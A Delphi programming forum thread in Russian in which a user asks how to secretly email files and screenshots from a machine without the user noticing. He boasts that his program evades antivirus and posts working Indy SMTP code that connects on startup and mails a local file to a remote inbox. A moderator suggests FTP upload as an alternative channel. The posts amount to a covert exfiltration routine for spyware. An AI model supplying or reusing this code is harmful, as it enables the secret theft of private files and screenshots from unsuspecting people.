Форум по Delphi программированию

Delphi Sources



Вернуться   Форум по Delphi программированию > Все о Delphi > Интернет и сети
Ник
Пароль
Регистрация <<         Правила форума         >> FAQ Пользователи Календарь Поиск Сообщения за сегодня Все разделы прочитаны

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
  #1  
Старый 14.01.2011, 13:04
hackvl hackvl вне форума
Прохожий
 
Регистрация: 14.01.2011
Сообщения: 28
Репутация: 10
Вопрос Скрытая отправка письма с вложением

нужно отправить несколько картинок
текст из едита отправляет нормально все,
что нужно добавить чтоб отправлялись еще картинки например из C:\S\1.jpg
кинул на форму ид смтп и ид месадж

PHP код:
idSmtp1.Host:='smtp.yandex.ru'// smtp сервер
idSmtp1.Port:=25 // Порт
idSmtp1.Username:='*******@yandex.ru' // Логин, от кого придет письмо
idSmtp1.Password:='******' // Пароль
idMessage1.Body.Text:=edit1.text // Текст письма

idMessage1.From.Text:='********@yandex.ru'// от кого email адрес
idMessage1.Recipients.EMailAddresses:='******@yandex.ru' // и кому отправляем
idMessage1.Subject:='Т' // Тема письма

idSmtp1.Connect();
if 
idSmtp1.Connected=true then;
idSmtp1.Send(idmessage1);
idSmtp1.Disconnect 
Ответить с цитированием
  #2  
Старый 14.01.2011, 13:44
Аватар для Konrad
Konrad Konrad вне форума
Эксперт
 
Регистрация: 19.03.2009
Сообщения: 1,261
Репутация: 45834
По умолчанию

Типа хоочешь парить прогу которая будет посылать тебе на мейл данные))))
Цитата:
Сообщение от hackvl
idSmtp1.Username:='*******@yandex.ru' ; // Логин, от кого придет письмо
idSmtp1.Password:='******' ; // Пароль
О да...
В проге находим твой пасс и заходим на твое мыло, а далее.........)))

Впринципе на компах блондинок, которым вконтакт заменяет весь инет - прокатит.

Последний раз редактировалось Konrad, 14.01.2011 в 13:52.
Ответить с цитированием
  #3  
Старый 14.01.2011, 14:00
hackvl hackvl вне форума
Прохожий
 
Регистрация: 14.01.2011
Сообщения: 28
Репутация: 10
По умолчанию

ну можно и не на мейл на фтп
только как на фтп это сделать может кто напишет?
Ответить с цитированием
  #4  
Старый 14.01.2011, 14:11
Аватар для Konrad
Konrad Konrad вне форума
Эксперт
 
Регистрация: 19.03.2009
Сообщения: 1,261
Репутация: 45834
По умолчанию

Завист от того что ты хочешь передавать?

Папку "Мои документы/Отдых в Турции/OLYMP"?
Где каждая фотка по 3 Мб....
ИЕ зависнет... блондинко перезагрузит комп)
Ответить с цитированием
  #5  
Старый 14.01.2011, 14:12
hackvl hackvl вне форума
Прохожий
 
Регистрация: 14.01.2011
Сообщения: 28
Репутация: 10
По умолчанию

нет мне нужно на емаил отправлять
как обычный юзер это заметит? никак
Ответить с цитированием
  #6  
Старый 14.01.2011, 14:14
Аватар для Konrad
Konrad Konrad вне форума
Эксперт
 
Регистрация: 19.03.2009
Сообщения: 1,261
Репутация: 45834
По умолчанию

Цитата:
Сообщение от hackvl
нет мне нужно на емаил отправлять
как обычный юзер это заметит? никак
если какая-то прога начнет в сеть передавать 1Гб фоток?)
Еще как заметит)
Ответить с цитированием
  #7  
Старый 14.01.2011, 14:15
hackvl hackvl вне форума
Прохожий
 
Регистрация: 14.01.2011
Сообщения: 28
Репутация: 10
По умолчанию

отправка будет 1мб
Кто сможет помоч?

Последний раз редактировалось hackvl, 14.01.2011 в 14:22.
Ответить с цитированием
  #8  
Старый 14.01.2011, 14:22
Аватар для Konrad
Konrad Konrad вне форума
Эксперт
 
Регистрация: 19.03.2009
Сообщения: 1,261
Репутация: 45834
По умолчанию

Цитата:
Сообщение от hackvl
отправка будет 1мб
Интересно что ты хоч впихнуть в 1Мб?
архив пасов?)
Архив хистори квипа?
Цитата:
Сообщение от hackvl
нужно отправить несколько картинок
Хм... интересно какие картинки интересуют теперяшних хакиров))))
Цитата:
Сообщение от hackvl
Кто сможет помоч?
Чем помочь? Помочь в отучении блондинок от сидения в инете без антивира?
Им уже ничем не поможешь, и твои благие намерения не принесут им пользы...

Последний раз редактировалось Konrad, 14.01.2011 в 14:32.
Ответить с цитированием
  #9  
Старый 14.01.2011, 18:13
hackvl hackvl вне форума
Прохожий
 
Регистрация: 14.01.2011
Сообщения: 28
Репутация: 10
По умолчанию

моя прога непалится антивирем 0/43
нужно просто отправить скриншот который сделает моя програма,
хватит уже флудить , надо просто подсказать что добавить чтоб отправить картинку на мыло
Ответить с цитированием
  #10  
Старый 14.01.2011, 18:56
hackvl hackvl вне форума
Прохожий
 
Регистрация: 14.01.2011
Сообщения: 28
Репутация: 10
По умолчанию

решил проблему
вот кидаете на форму
PHP код:
procedure TForm1.FormCreate(SenderTObject);
begin
try
IdSMTP1.AuthenticationType:=atLogin;
IdSMTP1.Host:='smtp.rambler.ru';
IdSMTP1.Port:=25;
IdSMTP1.Username:='xxxxxxxxx@rambler.ru';
IdSMTP1.Password:='password';
IdSMTP1.Connect;
except
on e
:Exception do
end;
end

это на кнопку илу еще куданить
PHP код:
procedure TForm1.Button1Click(SenderTObject);
var
msg:TIdMessage;
att:TIdAttachment;
begin
try
msg:=TIdMessage.Create(nil);
msg.Body.Add('email text');
msg.Subject:='header email';
msg.From.Address:='ххххххх@rambler.ru';//от кого отправляем
msg.From.Name:='Andrey';
msg.Recipients.EMailAddresses:='ххххххх@mail.ru';//кому отправляем
att:=TIdAttachment.Create(msg.MessageParts,'C:\1.txt');
msg.IsEncoded:=True;
if 
IdSMTP1.Connected=True then
begin
IdSMTP1
.Send(msg);
end;
att.Free;
msg.Free;
except
on e
:Exception do
begin
msg
.Free;
att.Free;
IdSMTP1.Disconnect;
end;
end;
end
Ответить с цитированием
  #11  
Старый 14.01.2011, 20:02
lmikle lmikle вне форума
Модератор
 
Регистрация: 17.04.2008
Сообщения: 8,015
Версия Delphi: 7, XE3, 10.2
Репутация: 49089
По умолчанию

Ну молодец, что разобрался.
А вообще, можно и на ftp лить (idFTPClient), а по почте посылвть только извещение.
Ответить с цитированием
  #12  
Старый 14.01.2011, 21:54
Аватар для Konrad
Konrad Konrad вне форума
Эксперт
 
Регистрация: 19.03.2009
Сообщения: 1,261
Репутация: 45834
По умолчанию

Все.. армагедец...
Побежал менять названия папок рабочего стола: П0рево1, П0рево2, П0рево151
Ответить с цитированием
Ответ


Delphi Sources

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB-коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Часовой пояс GMT +3, время: 18:36.


 

Сайт

Форум

FAQ

RSS лента

Прочее

 

Copyright © Форум "Delphi Sources" by BrokenByte Software, 2004-2023

ВКонтакте   Facebook   Twitter